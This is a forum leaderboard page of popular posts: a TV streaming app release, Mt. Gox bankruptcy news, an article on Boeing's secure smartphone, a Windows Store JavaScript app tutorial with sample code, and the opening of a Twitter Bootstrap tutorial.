Leaderboard

Popular Content

Showing content with the highest reputation on 02/28/14 in all areas

  1. I created this topic because I don't want to intrude on other people's topics, so I will post everything that is new in the application only in this topic.

     First version of TV online: Download: IRCGate.ro - Portal romanesc - Downloads

     Today I managed to finish the second version, with the following changes:
     - each category now has several channels
     - some stations also have server 1 or server 2
     - autoplay on every movie selection
     - TV channel information: URL address, sop address, and each channel has autoplay (active or inactive; most of them have it active)

     Download: IRCGate.ro - Portal romanesc - Downloads

     To run the application you need to have installed: .NET Framework 4.5 and SopCast.
    1 point
  2. Mt. Gox is officially filing for bankruptcy protection with an outstanding debt of ¥6.5bn ($63.6m), finally admitting openly that 750,000 of its customers’ bitcoins and 100,000 of the company’s own have been lost.

     The exchange’s lawyer announced the news during a conference at the Tokyo District Court late on Friday afternoon, Japan time. CEO Mark Karpeles, wearing a suit and tie, bowed deeply in the tradition of disgraced Japanese business leaders fronting the media. Subtitles read: “The 750,000 bitcoins we kept for users, (37,000 million yen), almost all gone.”

     The 850,000 BTC loss figure is higher than the 744,400 figure mentioned in the so-called “Crisis Strategy Draft” document leaked and released by Ryan Galt, aka The Two-Bit Idiot, earlier in the week. That same document also described fiat assets of $32.43m and liabilities of $55m. The assets include $5m “held by CoinLab” and another $5.5m “held by the DHS”. The Department of Homeland Security seized that amount from Mt. Gox’s US accounts in mid 2013, claiming it had not registered properly as a money transmission business.

     Nightmare week

     It’s been a nightmare week for Mt. Gox and its customers, with much of the situation’s true nature still mired in online speculation, rumor and conspiracy theories. The exact fate of all Mt. Gox customers’ bitcoins is still unclear: how such an amount came to be lost or stolen without anyone knowing or taking action, whether ‘transaction malleability’ was indeed behind it, or whether they were transferred to other addresses or lost to the bitcoin network altogether.

     CEO Karpeles resigned his position on the Bitcoin Foundation Board just four days ago, beginning a chain of events that culminated in today’s press event. Shortly after that, Mt. Gox’s entire Twitter history disappeared, the ‘crisis’ documents were leaked, and then the website went completely offline, taking with it most customer hopes of ever seeing their money again.

     The domain mtgox.com now features only a blank page with the Mt. Gox logo and two short statements, one of which reads “In light of recent news reports and the potential repercussions on MtGox’s operations and the market, a decision was taken to close all transactions for the time being in order to protect the site and our users. We will be closely monitoring the situation and will react accordingly.” The most recent, from 26th February, reassures everyone that Karpeles is still in Japan and “working very hard with the support of different parties to find a solution to our recent issues.”

     While no regulatory action is guaranteed in Japan, federal prosecutors in New York City have subpoenaed Mt. Gox and requested that it preserve documents that may be relevant.

     Protest ends, customers lament

     Kolin Burges, who triggered media interest around the world with his protest outside Mt. Gox’s office and confrontation with Karpeles nearly two weeks ago, took the opportunity to back up his signs and head back to London. Most customers have now resigned themselves to losing hundreds of thousands or even millions of dollars, including those who claim to have lost business startup capital, college funds or even entire life savings in the crash. Burges himself claimed to have lost around $300,000 in bitcoins.

     Source: Mt. Gox Files for Bankruptcy, Claims $63.6m Debt
    1 point
  3. Looking for a Secure Smartphone? World's biggest Aerospace company - Boeing is finally close to the launch of its high-security Android Smartphone, called "Boeing Black (H8V-BLK1)", primarily designed for secure communication between Governmental agencies and their contractors.

     Encrypted email, Secure Instant Messaging and Other privacy services and tools are booming in the wake of the National Security Agency’s recently revealed surveillance programs. Encryption isn’t meant to keep hackers out, but when it’s designed and implemented correctly, it alters the way messages look. Boeing is the company which is already providing secure communications for US Government officials, including the president.

     Don't mess with it, It can Self-Destruct: Boeing Black Smartphone can Self-Destruct if it is tampered with, destroying all the data on it. The device is delivered in complete sealed form, any attempt to open the seal of the device will destruct the operating system and functionality of the device. “Any attempt to break open the casing of the device would trigger functions that would delete the data and software contained within the device and make the device inoperable,” says the paperwork. Well, another important fact to be noticed, Boeing Black (H8V-BLK1) won't be available to average consumers, it is designed for Governmental agencies, Defense and Homeland security only.

     Ultra-Secure Mobile Operating System: Boeing's modified Android operating system has a specific software security policy configuration, so users can configure the device for maximum mission productivity and security. "Boeing Black’s security is powered by the Boeing PureSecure architecture, which was designed from the outset for the mobile environment. Our architectural foundation is built upon layers of trust from embedded hardware, operating system policy controls, and compatibility with leading mobile device management systems.
     The device’s hardware roots of trust and trusted boot ensure the device starts in a trusted state, enabling the maximum security of data. Hardware media encryption and configurable inhibit controls are embedded to protect the device, its data, and the transmission of information, significantly reducing the risk of mission compromise due to data loss." according to the paperwork they filed with the Federal Communication Commission (FCC).

     Boeing Black supports dual MicroSIM with GSM, WCDMA, and LTE on a wide range of bands to facilitate global use and operates on a modified version of the Android operating system that keeps all details as secure as possible.

     Security and Confidentiality of the information of any person related to the National Security must be a high priority, but a problem arises when NSA-like agencies start capturing the data flowing on the backbone of the communication channel and bribe software companies to weaken the encryption, and that compels a user to think twice before opting for new inventions and products.

     At the Mobile World Congress in Barcelona, Washington-based software firm Silent Circle and Madrid-based Geeksphone teamed up to launch the Blackphone, a highly secure device that doesn't run on any traditional telecom carriers or operating systems. We have reported earlier, there is another interesting Self-destructing Chips project, that has been handed over to IBM by the Defense Advanced Research Projects Agency (DARPA).

     Source: Boeing launches Ultra-Secure 'Black' Smartphone that has Self-Destruct Feature - The Hacker News
    1 point
  4. One of the advantages for developing Windows Store apps is that you can utilize your existing knowledge of HTML, CSS and JavaScript. This tutorial teaches you how to create a simple “Hello, world” Windows Store app built for Windows using JavaScript.

     In this tutorial, you learn how to:

     * Create a new project
     * Add HTML content to your start page
     * Handle touch, pen, and mouse input
     * Switch between the light and dark style sheets
     * Create your own custom styles
     * Use a Windows Library for JavaScript control

     We show you how to create a Windows Store app using HTML, JavaScript, and CSS. Note that you can also create Windows Store apps using other technologies. To write a Windows Store app using C# and Visual Basic, or C++ and XAML. For graphics-intensive apps, you can use DirectX and C++.

     Getting Started

     To complete this tutorial, you need Windows 8 and Microsoft Visual Studio Express 2012 for Windows 8. To download them, see Get the tools. You also need a developer license. For instructions, see Get a developer license.

     Step 1: Create a new project in Visual Studio

     Let’s create a new app named HelloWorld. Here’s how:

     1. Launch Visual Studio Express 2012 for Windows 8. The Visual Studio Express 2012 for Windows 8 start screen appears.
     2. From the File menu select New Project. The New Project dialog appears. The left pane of the dialog lets you pick the type of templates to display.
     3. In the left pane, expand Installed, then expand Templates, then expand JavaScript and select the Windows Store template type. The dialog’s center pane displays a list of project templates for JavaScript. For this tutorial, we use the Blank App template. This template creates a minimal Windows Store app that compiles and runs, but contains no user interface controls or data. We’ll add controls and data to the app over the course of these tutorials.
     4. In the center pane, select the Blank App template.
     5. In the Name text box, enter “HelloWorld”.
     6. Uncheck the Create directory for solution checkbox.
     7. Click OK to create the project. Visual Studio creates your project and displays it in the Solution Explorer.

     Although the Blank App is a minimal template, it still contains a handful of files:

     * A manifest file (package.appxmanifest) that describes your app (its name, description, tile, start page, splash screen, and so on) and lists the files that your app contains.
     * A set of large and small logo images (logo.png and smalllogo.png) to display in the start screen.
     * An image (storelogo.png) to represent your app in the Windows Store.
     * A splash screen (splashscreen.png) to show when your app starts.
     * CSS and code files for the Windows Library for JavaScript (inside the References folder).
     * A start page (default.html) and an accompanying JavaScript file (default.js) that run when your app starts.

     These files are essential to all Windows Store apps using JavaScript. Any project that you create in Visual Studio contains them.

     Step 2: Launch the app

     At this point, we created a very simple app. If you want to see what it looks like, press F5 to build, deploy, and start your app. A default splash screen appears first. The splash screen is defined by an image (splashscreen.png) and a background color (specified in our app’s manifest file). We don’t cover it here, but it’s easy to customize your splash screen. (To find out how, see Adding a splash screen.)

     The splash screen disappears, and then our app appears. It contains a black screen with the text “Content goes here”. There is no button or command to close the app. To close the app, slide from the top edge toward the bottom edge of the screen or press Alt-F4. Go to the Start screen; notice that deploying the app adds its tile to the last group on the Start screen. To run the app again, tap or click its tile on the start screen or press F5 in Visual Studio to run the app in the debugger.

     It doesn’t do much—yet—but congratulations, you’ve built your first Windows Store app!

     Step 3: Modify your start page

     One of the files that Visual Studio created for us is default.html, our app’s start page. When the app runs, it displays the content of its start page. The start page also contains references to the app’s code files and style sheets. Here’s the start page that Visual Studio created for us:

         <!DOCTYPE html>
         <html>
         <head>
             <meta charset="utf-8" />
             <title>HelloWorld</title>

             <!-- WinJS references -->
             <link href="//Microsoft.WinJS.1.0/css/ui-dark.css" rel="stylesheet" />
             <script src="//Microsoft.WinJS.1.0/js/base.js"></script>
             <script src="//Microsoft.WinJS.1.0/js/ui.js"></script>

             <!-- HelloWorld references -->
             <link href="/css/default.css" rel="stylesheet" />
             <script src="/js/default.js"></script>
         </head>
         <body>
             <p>Content goes here</p>
         </body>
         </html>

     Let’s add some new content to your default.html file. Just as you would add content to any other HTML file, you add your content inside the body element. You can use HTML5 elements to create your app (with a few exceptions). That means you can use HTML5 elements like h1, p, button, div, and img.

     To modify our start page

     1. Replace the existing content in the body element with a first-level heading that says “Hello, world!”, some text that asks the user’s name, an input element to accept the user’s name, a button, and a div element. Assign IDs to the input, the button, and the div.

         <body>
             <h1>Hello, world!</h1>
             <p>What's your name?</p>
             <input id="nameInput" type="text" />
             <button id="helloButton">Say "Hello"</button>
             <div id="greetingOutput"></div>
         </body>

     2. Run the app. Right now, clicking the button doesn’t do anything. In the next steps, we create an event handler for the button that displays a personalized greeting. We add our event handler code to our default.js file.

     Step 4: Create an event handler

     When we created our new project, Visual Studio created a /js/default.js file for us.
     This file contains code for handling your app’s lifecycle, a concept that we explain in Part 2: Manage app lifecycle and state. It’s also where you write additional code that provides interactivity for your default.html file.

     Open the default.js file. Before we start adding our own code, let’s take a look at the first and last few lines of code in the file:

         (function () {
             "use strict";

             // Omitted code

         })();

     You might be wondering what’s going on here. These lines of code wrap the rest of the default.js code in a self-executing anonymous function. Now that you know what it does, you’re probably wondering why we wrap our code in a self-executing anonymous function. It’s because this makes it easier to avoid naming conflicts or situations where you accidentally modify a value that you didn’t intend to. It also keeps unnecessary identifiers out of the global namespace, which helps performance. It looks a little strange, but it’s a good programming practice.

     The next line of code turns on strict mode for your JavaScript code. Strict mode provides additional error checking for your code. For example, it prevents you from using implicitly declared variables or assigning a value to a read-only property.

     Take a look at the rest of the code in default.js. It handles your app’s activated and checkpoint events. We go into more detail about these events later. For now, just know that the activated event fires when your app starts.

     Let’s define an event handler for your button. Our new event handler gets the user’s name from the nameInput input control and uses it to output a greeting to the greetingOutput div element that you created in the last section.

     Using events that work for touch, mouse, and pen input

     With Windows 8, you don’t need to worry about the differences between touch, mouse, and other forms of pointer input. You can just use events that you know, like click, and they work for all forms of input.

     Tip: Your app can also use the new MSPointer* and MSGesture* events, which work for touch, mouse, and pen input and can provide additional info about the device that triggered the event. For more info, see Responding to user interaction and Gestures, manipulations, and interactions.

     Let’s go ahead and create the event handler.

     To create the event handler

     1. In default.js, after the app.oncheckpoint event handler and before the call to app.start, create a click event handler function named buttonClickHandler that takes a single parameter named eventInfo.
     2. Inside our event handler, retrieve the user’s name from the nameInput input control and use it to create a greeting. Use the greetingOutput div to display the result.

         function buttonClickHandler(eventInfo) {
             var userName = document.getElementById("nameInput").value;
             var greetingString = "Hello, " + userName + "!";
             document.getElementById("greetingOutput").innerText = greetingString;
         }

     We added our event handler to default.js. Now we need to register it.

     Step 5: Register the event handler when our app launches

     The only thing we need to do now is register the event handler with the button. The recommended way to register an event handler is to call addEventListener from our code. A good place to register the event handler is when our app is activated. Fortunately, Visual Studio generated some code for us in our default.js file that handles our app’s activation: the app.onactivated event handler. Let’s take a look at this code.

         WinJS.Binding.optimizeBindingReferences = true;

         var app = WinJS.Application;
         var activation = Windows.ApplicationModel.Activation;

         app.onactivated = function (args) {
             if (args.detail.kind === activation.ActivationKind.launch) {
                 if (args.detail.previousExecutionState !== activation.ApplicationExecutionState.terminated) {
                     // TODO: This application has been newly launched. Initialize
                     // your application here.
                 } else {
                     // TODO: This application has been reactivated from suspension.
                     // Restore application state here.
                 }
                 args.setPromise(WinJS.UI.processAll());
             }
         };

     Inside the onactivated handler, the code checks to see what type of activation occurred. There are many different types of activations. For example, your app is activated when the user launches your app and when the user wants to open a file that is associated with your app. (For more info, see Application lifecycle.)

     We’re interested in the launch activation. An app is launched whenever it is not running and then a user activates it. If the activation is a launch activation, the code checks to see how the app was shut down the last time it ran. Then it calls WinJS.UI.processAll.

         app.onactivated = function (args) {
             if (args.detail.kind === activation.ActivationKind.launch) {
                 if (args.detail.previousExecutionState !== activation.ApplicationExecutionState.terminated) {
                     // TODO: This application has been newly launched. Initialize
                     // your application here.
                 } else {
                     // TODO: This application has been reactivated from suspension.
                     // Restore application state here.
                 }
                 args.setPromise(WinJS.UI.processAll());
             }
         };

     It calls WinJS.UI.processAll regardless of whether the app had been shut down in the past or whether this is the very first time it’s being launched. The WinJS.UI.processAll is enclosed in a call to the setPromise method, which makes sure the splash screen isn’t taken down until the app’s page is ready.

     Tip: The WinJS.UI.processAll function scans your default.html file for Windows Library for JavaScript controls and initializes them. So far, we haven’t added any of these controls, but it’s a good idea to leave this code in case you want to add them later. To learn more about Windows Library for JavaScript controls, see Quickstart: Adding WinJS controls and styles.

     A good place to register event handlers for non-Windows Library for JavaScript controls is just after the call to WinJS.UI.processAll.

     To register your event handler

     In the onactivated event handler in default.js, retrieve helloButton and use addEventListener to register our event handler for the click event. Add this code after the call to WinJS.UI.processAll.

         app.onactivated = function (args) {
             if (args.detail.kind === activation.ActivationKind.launch) {
                 if (args.detail.previousExecutionState !== activation.ApplicationExecutionState.terminated) {
                     // TODO: This application has been newly launched. Initialize
                     // your application here.
                 } else {
                     // TODO: This application has been reactivated from suspension.
                     // Restore application state here.
                 }
                 args.setPromise(WinJS.UI.processAll());

                 // Retrieve the button and register our event handler.
                 var helloButton = document.getElementById("helloButton");
                 helloButton.addEventListener("click", buttonClickHandler, false);
             }
         };

     Here’s the complete code for our updated default.js file:

         // For an introduction to the Blank template, see the following documentation:
         // JavaScript project templates for Windows Store apps (Windows)
         (function () {
             "use strict";

             WinJS.Binding.optimizeBindingReferences = true;

             var app = WinJS.Application;
             var activation = Windows.ApplicationModel.Activation;

             app.onactivated = function (args) {
                 if (args.detail.kind === activation.ActivationKind.launch) {
                     if (args.detail.previousExecutionState !== activation.ApplicationExecutionState.terminated) {
                         // TODO: This application has been newly launched. Initialize
                         // your application here.
                     } else {
                         // TODO: This application has been reactivated from suspension.
                         // Restore application state here.
                     }
                     args.setPromise(WinJS.UI.processAll());

                     // Retrieve the button and register our event handler.
                     var helloButton = document.getElementById("helloButton");
                     helloButton.addEventListener("click", buttonClickHandler, false);
                 }
             };

             app.oncheckpoint = function (args) {
                 // TODO: This application is about to be suspended. Save any state
                 // that needs to persist across suspensions here. You might use the
                 // WinJS.Application.sessionState object, which is automatically
                 // saved and restored across suspension. If you need to complete an
                 // asynchronous operation before your application is suspended, call
                 // args.setPromise().
             };

             function buttonClickHandler(eventInfo) {
                 var userName = document.getElementById("nameInput").value;
                 var greetingString = "Hello, " + userName + "!";
                 document.getElementById("greetingOutput").innerText = greetingString;
             }

             app.start();
         })();

     Run the app. When you enter your name in the text box and click the button, the app displays a personalized greeting.

     Note: If you’re curious as to why we use addEventListener to register our event in code rather than setting the onclick event in our HTML, see Coding basic apps for a detailed explanation.

     Step 6: Style our start page

     It’s easy to customize the look and feel of your app. Windows Store apps let you use Cascading Style Sheets, Level 3 (CSS3), much like you would for a website.

     The default.html that Visual Studio created for us contains a reference to the Windows Library for JavaScript style sheet:

         <!-- WinJS references -->
         <link href="//Microsoft.WinJS.1.0/css/ui-dark.css" rel="stylesheet" />

     What does this style sheet do? Quite a bit! It provides these benefits:

     * A set of styles that automatically give our app the Windows 8 look and feel. Just including the style sheet will make our controls look great and they’ll work with touch-based displays, too.
     * Automatic support for high-contrast modes. These styles were designed with high-contrast in mind, so when our app runs on a device in high-contrast mode, it displays properly.
     * Automatic support for other languages. The Windows Library for JavaScript style sheets automatically select the correct font for every language that Windows 8 supports. You can even use multiple languages in the same app and they are displayed properly.
     * Automatic support for other reading orders. It automatically adjusts HTML and Windows Library for JavaScript controls, layouts, and styles for languages that read from right to left.

     By default, each HTML page in your project contains a reference to the dark style sheet. The Windows Library for JavaScript also provides a light style sheet. Let’s try it out and see what it looks like.

     To switch to the light style sheet

     1. In your default.html file, replace the reference to the dark style sheet:

         <!-- WinJS references -->
         <link href="//Microsoft.WinJS.1.0/css/ui-dark.css" rel="stylesheet" />

        With this one:

         <!-- WinJS references -->
         <link href="//Microsoft.WinJS.1.0/css/ui-light.css" rel="stylesheet" />

     2. Run your app. It now uses the light style sheet.

     Which style sheet should you use? Whichever one you want. For apps that mostly display images or video, we recommend using the dark style sheet, and for apps that contain a lot of text, we recommend using the light style sheet. (If you’re using a custom color scheme, use the style sheet that goes best with your app’s look and feel.)

     Creating your own styles

     If you want to customize the look and feel from your app, you don’t have to throw out the Windows Library for JavaScript styles and start over from scratch. It’s easy to make incremental changes by overriding the styles you want to change.

     In fact, it’s better to override the Windows Library for JavaScript styles rather than creating your own. When your app runs in high-contrast mode, any changes to the colors in the default styles are automatically overridden by a color scheme that supports high-contrast.

     You can override any style in the default style sheet by creating your own style sheet and including it after the Windows Library for JavaScript style sheet. The Blank App template does this for you. It creates a style sheet named default.css that you can use to create your own styles.

         <!-- WinJS references -->
         <link href="//Microsoft.WinJS.1.0/css/ui-light.css" rel="stylesheet" />
         <script src="//Microsoft.WinJS.1.0/js/base.js"></script>
         <script src="//Microsoft.WinJS.1.0/js/ui.js"></script>

         <!-- HelloWorld references -->
         <link href="/css/default.css" rel="stylesheet" />
         <script src="/js/default.js"></script>

     Let’s create some of our own styles.

     1. First, let’s add some div elements and classes to our HTML to make it easier to style.

        1. In Visual Studio, open the default.html file.
        2. Set your page header’s class attribute to “headerClass”. Create a div element and use it to contain your page’s main content. Give it a class setting of “mainContent”.

         <body>
             <h1 class="headerClass">Hello, world!</h1>
             <div class="mainContent">
                 <p>What's your name?</p>
                 <input id="nameInput" type="text" />
                 <button id="helloButton">Say "Hello"</button>
                 <div id="greetingOutput"></div>
             </div>
         </body>

     2. Now let’s define our styles. Open the default.css file. Let’s take a look at the file that Visual Studio generated for us:

         body {
         }

         @media screen and (-ms-view-state: fullscreen-landscape) {
         }

         @media screen and (-ms-view-state: filled) {
         }

         @media screen and (-ms-view-state: snapped) {
         }

         @media screen and (-ms-view-state: fullscreen-portrait) {
         }

        The generated file contains a few stubs for defining styles for different views. We’ll ignore these stubs for now (but we play with them in a later tutorial).

     3. According to Laying out an app page, the heading has a top margin of 45 pixels and a left margin of 120 pixels. The content area also has a left margin of 120 pixels, a top margin of 31 pixels, and a bottom margin of 50 pixels. Define the headerClass and mainContent classes and set their margins to follow these guidelines. Also, create a style for the greetingOutput div that sets its height to 20 pixels and its bottom margin to 40 pixels.

         body {
         }

         .headerClass {
             margin-top: 45px;
             margin-left: 120px;
         }

         .mainContent {
             margin-top: 31px;
             margin-left: 120px;
             margin-bottom: 50px;
         }

         #greetingOutput {
             height: 20px;
             margin-bottom: 40px;
         }

         @media screen and (-ms-view-state: fullscreen-landscape) {
         }

         @media screen and (-ms-view-state: filled) {
         }

         @media screen and (-ms-view-state: snapped) {
         }

         @media screen and (-ms-view-state: fullscreen-portrait) {
         }

     Windows Store apps support CSS3, so there’s a lot you can do to customize your app. (For more info about styling your app, see Quickstart: Styling controls.)

     Step 7: Add a Windows Library for JavaScript control

     In addition to standard HTML controls, your Windows Store apps using JavaScript can use any of the new controls in the Windows Library for JavaScript, such as the WinJS.UI.DatePicker, WinJS.UI.FlipView, WinJS.UI.ListView, and WinJS.UI.Rating controls.

     Unlike HTML controls, Windows Library for JavaScript controls don’t have dedicated markup elements: you can’t create a Rating control by adding a element, for example. To add a Windows Library for JavaScript control, you create a div element and use the data-win-control attribute to specify the type of control you want. To add a Rating control, you set the attribute to “WinJS.UI.Rating”.

     Let’s add a Rating control to our app.

     1. In your default.html file, add a label and a Rating control after the greetingOutput div.

         <body>
             <h1 class="headerClass">Hello, world!</h1>
             <div class="mainContent">
                 <p>What's your name?</p>
                 <input id="nameInput" type="text" />
                 <button id="helloButton">Say "Hello"</button>
                 <div id="greetingOutput"></div>
                 <label for="ratingControlDiv">
                     Rate this greeting:
                 </label>
                 <div id="ratingControlDiv" data-win-control="WinJS.UI.Rating">
                 </div>
             </div>
         </body>

        For the Rating to load, your page must call WinJS.UI.processAll.
        Because our app is using one of the Visual Studio templates, our default.js already includes a call to WinJS.UI.processAll, as described earlier in Step 5, so you don’t have to add any code.

     2. Run the app. Notice the new Rating control.

     Right now, clicking the Rating control changes the rating, but it doesn’t do anything else. Let’s use an event handler to do something when the user changes the rating.

     Step 8: Register an event handler for a Windows Library for JavaScript control

     Registering an event handler for a Windows Library for JavaScript control is a little different than registering an event handler for a standard HTML control. Earlier, we mentioned that the onactivated event handler calls WinJS.UI.processAll method to initialize Windows Library for JavaScript in your markup. The WinJS.UI.processAll is enclosed in a call to the setPromise method.

         args.setPromise(WinJS.UI.processAll());

     If Rating were a standard HTML control, you could add your event handler after this call to WinJS.UI.processAll. But it’s a little more complicated for a Windows Library for JavaScript control like our Rating. Because WinJS.UI.processAll creates the Rating control for us, we can’t add the event handler to Rating until after WinJS.UI.processAll has finished its processing.

     If WinJS.UI.processAll were a typical method, we could register the Rating event handler right after we call it. But the WinJS.UI.processAll method is asynchronous, so any code that follows it might run before WinJS.UI.processAll completes. So, what do we do? We use a Promise object to receive notification when WinJS.UI.processAll completes.

     Like all asynchronous Windows Library for JavaScript methods, WinJS.UI.processAll returns a Promise object. A Promise is a “promise” that something will happen in the future; when that thing happens, the Promise is said to have completed. Promise objects have a then method that takes a “completed” function as a parameter.
     The Promise calls this function when it completes. By adding your code to a “completed” function and passing it to the Promise object’s then method, you can be sure your code executes after WinJS.UI.processAll is complete.

     1. Let’s output the rating value when the user selects a rating. In your default.html file, create a div element to display the rating value and give it the id “ratingOutput”.

         <body>
             <h1 class="headerClass">Hello, world!</h1>
             <div class="mainContent">
                 <p>What's your name?</p>
                 <input id="nameInput" type="text" />
                 <button id="helloButton">Say "Hello"</button>
                 <div id="greetingOutput"></div>
                 <label for="ratingControlDiv">
                     Rate this greeting:
                 </label>
                 <div id="ratingControlDiv" data-win-control="WinJS.UI.Rating">
                 </div>
                 <div id="ratingOutput"></div>
             </div>
         </body>

     2. In our default.js file, create an event handler for the Rating control’s change event named ratingChanged. The eventInfo parameter contains a detail.tentativeRating property that provides the new user rating. Retrieve this value and display it in the output div.

         function ratingChanged(eventInfo) {
             var ratingOutput = document.getElementById("ratingOutput");
             ratingOutput.innerText = eventInfo.detail.tentativeRating;
         }

     3. Update the code in our onactivated event handler that calls WinJS.UI.processAll by adding a call to the then method and passing it a completed function. In the completed function, retrieve the ratingControlDiv element that hosts the Rating control. Then use the winControl property to retrieve the actual Rating control. (This example defines the completed function inline.)

         args.setPromise(WinJS.UI.processAll().then(function completed() {

             // Retrieve the div that hosts the Rating control.
             var ratingControlDiv = document.getElementById("ratingControlDiv");

             // Retrieve the actual Rating control.
             var ratingControl = ratingControlDiv.winControl;

             // Register the event handler.
             ratingControl.addEventListener("change", ratingChanged, false);

         }));

     4. While it’s fine to register event handlers for HTML controls after the call to WinJS.UI.processAll, it’s also OK to register them inside your completed function. For simplicity, let’s go ahead and move all our event handler registrations inside the then event handler.

        Here’s our updated onactivated event handler:

         app.onactivated = function (args) {
             if (args.detail.kind === activation.ActivationKind.launch) {
                 if (args.detail.previousExecutionState !== activation.ApplicationExecutionState.terminated) {
                     // TODO: This application has been newly launched. Initialize
                     // your application here.
                 } else {
                     // TODO: This application has been reactivated from suspension.
                     // Restore application state here.
                 }
                 args.setPromise(WinJS.UI.processAll().then(function completed() {

                     // Retrieve the div that hosts the Rating control.
                     var ratingControlDiv = document.getElementById("ratingControlDiv");

                     // Retrieve the actual Rating control.
                     var ratingControl = ratingControlDiv.winControl;

                     // Register the event handler.
                     ratingControl.addEventListener("change", ratingChanged, false);

                     // Retrieve the button and register our event handler.
                     var helloButton = document.getElementById("helloButton");
                     helloButton.addEventListener("click", buttonClickHandler, false);

                 }));
             }
         };

     5. Run the app. When you select a rating value, it outputs the numeric value below the Rating control.

     Note: This section and the last one just touched on what you need to know to start using Windows Library for JavaScript control. To learn more and to see a list of controls, see Quickstart: Adding WinJS controls and styles.

     Summary

     We’ve just seen how to add content to a Windows Store app, as well as how to add interactivity and how to style the app.

     This tutorial is brought to you by the team at MSDN. To learn more about coding for Windows Store apps, please visit Windows Store App development – Windows Dev Center

     See the complete code

     Did you get stuck, or do you want to check your work? If so, see complete code.

How to Create a Windows Store app using HTML and JS | Web Resources | WebAppers
    1 point
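The ordering problem that Step 8 of the tutorial describes, as an added example that is not part of the original tutorial or of WinJS: registering the handler right after the asynchronous call fails because the control does not exist yet, while registering it in the then callback works. mockProcessAll, makeHost, makeRating and simulateUserRating are hypothetical stand-ins written for this example so it runs in plain Node.js.

```javascript
// Added illustration. mockProcessAll and the host/control objects are
// stand-ins written for this example; they are not WinJS APIs.

// A host element as the tutorial's markup describes it: a div that will
// later carry the control in its winControl property.
function makeHost(id) {
  return { id: id, winControl: undefined };
}

// Minimal Rating stand-in: stores "change" listeners and lets the example
// simulate a user selecting a rating.
function makeRating() {
  var listeners = [];
  return {
    addEventListener: function (type, handler) {
      if (type === "change") { listeners.push(handler); }
    },
    simulateUserRating: function (value) {
      listeners.forEach(function (handler) {
        handler({ detail: { tentativeRating: value } });
      });
    }
  };
}

// Behaves the way the tutorial says WinJS.UI.processAll does: it returns
// immediately with a Promise and creates the controls later.
function mockProcessAll(hosts) {
  return new Promise(function (resolve) {
    setTimeout(function () {
      hosts.forEach(function (host) { host.winControl = makeRating(); });
      resolve();
    }, 0);
  });
}

function runDemo() {
  var host = makeHost("ratingControlDiv");
  var seen = [];
  function ratingChanged(eventInfo) {
    seen.push(eventInfo.detail.tentativeRating);
  }

  var result = { earlyError: null, controlReadyInThen: false, ratingsSeen: seen };

  var done = mockProcessAll([host]).then(function completed() {
    // Safe: the control exists by the time the Promise completes.
    result.controlReadyInThen = host.winControl !== undefined;
    host.winControl.addEventListener("change", ratingChanged, false);
    host.winControl.simulateUserRating(4);
    return result;
  });

  // Unsafe: this runs before the timer above fires, so winControl is still
  // undefined and the registration attempt throws.
  try {
    host.winControl.addEventListener("change", ratingChanged, false);
  } catch (e) {
    result.earlyError = e.name;
  }
  return done;
}

runDemo().then(function (r) { console.log(r); });
```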
  5. "Welcome to the responsive web!"

In the last year or so this term has been thrown around everywhere, so often that even a lot of my clients are asking for a responsive design from the get-go. This, to me, is really interesting because they never asked for a mobile or tablet version back in the day. One would argue that mobile wasn't so mainstream and everybody was trying to imitate the iOS interface on the web, and I agree, it was bad, but that's not the only reason why clients are asking for responsive!? Somehow they think we turn responsive design on or off as we please and that it's just normal to have, so the price should stay the same. Well, it's not that easy.

How to use Twitter Bootstrap to Create a Responsive Website Design

Responsive web design is an approach, I often call it a mindset, because you have to change the way you think when you're going responsive. The basic idea behind it is: one design to rule them all - no m.domain.com, no touch.domain.com, no 3 separate CSS files, no 7 PSD files for each device or each orientation - just “domain.com” looking the same on desktop, tablet and phone.

The idea of responsive design relies on CSS3 media queries that target specific screen resolutions and sizes. Now media queries have been around for a while, but we used them to target print styles, mostly. With CSS3 they kind of evolved and became actually useful. Fun fact: today you can even write a media query for devices that weigh let's say 3KG. Crazy, right?

Two things are sure if you’ll start creating responsive designs:

- More work - mostly more CSS code and often some JS but also lots of thinking and planning about the UI itself, how it scales, how users interact with it and so on.
- A whole lot of testing - this is the biggest downside. The only true way of testing responsive design is by actually using it on the devices themselves and you can imagine writing 5 lines of CSS then grabbing the iPad, loading the web, turning it landscape, oops it doesn't look so hot when in landscape, so back to code again...ugh and you get the point.

Here comes the good part, there is an almost magical way to start creating responsive designs and its name is Twitter Bootstrap.

Twitter Bootstrap - Your New BFF

Twitter Bootstrap was created by two guys at Twitter who wanted to speed up and bootstrap their workload and code. If you visit the home page of Twitter Bootstrap they define it as: “sleek, intuitive, and powerful front-end framework for faster and easier web development.” and they are not lying to you! I’m usually not big on frameworks and like to code as much as possible myself for various reasons so trust me on this one when I say it’s worth every minute you will spend learning it and that’s not going to be long.

Twitter Bootstrap offers you a lot of amazing stuff out of the box:

- Global styles for the body to reset type and background, link styles, grid system, and two simple layouts.
- Styles for common HTML elements like typography, code, tables, forms, and buttons, and a great little icon set.
- Basic styles for common interface components like tabs and pills, navbar, alerts, page headers, and more.
- Javascript plugins for things like tooltips, popovers, modals, and more.

But the most important part: it's really easy to learn and use, plus it has very good documentation and all the examples a developer could dream of. So let’s dig into it.

Getting started with Bootstrap

The first thing you want to do is visit the Bootstrap download page (it might be a good time to bookmark that URL as well). You can find the docs for everything there, including some basic guides and tutorials, so I won’t waste my time explaining that.

This is important, you can download the framework from their homepage or you can download a customized version which I prefer more because you get to choose and select what you need or want. The best thing about this version is that it comes with just one CSS file with all the responsive media queries you need unlike the other version where you have one normal CSS file and a separate CSS file for media queries and a bunch of JS files which is just messy.

So if you hop on to the Customize Bootstrap page, you’ll see that you can turn off/on things like JS plug-ins, CSS styles, UI components, responsive queries, define fonts, colors and so on. For this article you can just leave everything by default and click on the big “Download Customized Version” button.

After you download and extract the package you will get the following:

    - bootstrap/
    -- css/
    --- bootstrap.css (safe to delete)
    --- bootstrap.min.css
    -- js/
    --- bootstrap.js (safe to delete)
    --- bootstrap.min.js
    -- img/
    --- glyphicons-halflings.png
    --- glyphicons-halflings-white.png

First thing you can do is delete the non-minified versions of the CSS & JS files (bootstrap.css, bootstrap.js) because I don’t think you’ll be needing to fix or edit any of the bootstrap code but also the minified versions are a lot smaller and production ready.

Next up it’s time to include them into your project. So let’s imagine we have a blank HTML file that goes something like this:

    <!DOCTYPE html>
    <html>
    <head>
      <meta charset="utf-8">
      <title>No Bootstrap in this project</title>
    </head>
    <body>
      <p>Hey, i wanna be responsive too </p>
    </body>
    </html>

